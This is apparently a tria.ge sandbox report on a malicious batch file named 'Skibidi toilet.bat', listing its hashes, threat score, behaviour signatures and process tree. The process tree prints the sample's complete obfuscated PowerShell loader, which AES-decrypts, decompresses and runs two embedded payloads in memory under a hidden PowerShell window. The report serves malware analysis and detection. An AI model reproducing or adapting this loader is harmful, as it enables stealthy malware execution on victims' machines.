Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/10/2024, 06:39
Static task
static1
Behavioral task
behavioral1
Sample
Skibidi toilet.bat
Resource
win7-20240903-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Skibidi toilet.bat
Resource
win10v2004-20240802-en
26 signatures
150 seconds
General
-
Target
Skibidi toilet.bat
-
Size
394KB
-
MD5
74b141f7f2a33f196ef5bc80271f9362
-
SHA1
90bc22961bbf9bee09fc9781e09cc07539efdc9f
-
SHA256
d045a5c4b8dde317db30177b67e8dbda3f96fe3932511da4b48c9727ee4300bb
-
SHA512
b0444194e81a206241aa8b33e88fa7b6a1190b9a883e0d2a1348ba0dbb6938774c88a9f7dccb43dcf1b7b78fd1dad21c7e343d6e00e6cc479d509422ab1f4bc0
-
SSDEEP
12288:8yC/peKGA87tHcAoKFaVxligFt7CeTGW4e:R2EKL87cQaRign+e
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2028 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2028 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2352 wrote to memory of 1184 2352 cmd.exe 31 PID 2352 wrote to memory of 1184 2352 cmd.exe 31 PID 2352 wrote to memory of 1184 2352 cmd.exe 31 PID 2352 wrote to memory of 2028 2352 cmd.exe 32 PID 2352 wrote to memory of 2028 2352 cmd.exe 32 PID 2352 wrote to memory of 2028 2352 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Skibidi toilet.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0zB5oNxw8ChOTR95+B7+FqMqcWMDZ3zXPUOZ3OFVNvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1oecpyE1wbmZA6wwUszdsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EyndQ=New-Object System.IO.MemoryStream(,$param_var); $zsSyH=New-Object System.IO.MemoryStream; $pyawh=New-Object System.IO.Compression.GZipStream($EyndQ, [IO.Compression.CompressionMode]::Decompress); $pyawh.CopyTo($zsSyH); $pyawh.Dispose(); $EyndQ.Dispose(); $zsSyH.Dispose(); $zsSyH.ToArray();}function execute_function($param_var,$param2_var){ $biCMJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zPMku=$biCMJ.EntryPoint; $zPMku.Invoke($null, $param2_var);}$nJNeX = 'C:\Users\Admin\AppData\Local\Temp\Skibidi toilet.bat';$host.UI.RawUI.WindowTitle = $nJNeX;$fOqpF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nJNeX).Split([Environment]::NewLine);foreach ($gaYRM in $fOqpF) { if ($gaYRM.StartsWith('sfseDMVMVhMjxEnxjzbU')) { $gfrZZ=$gaYRM.Substring(20); break; }}$payloads_var=[string[]]$gfrZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-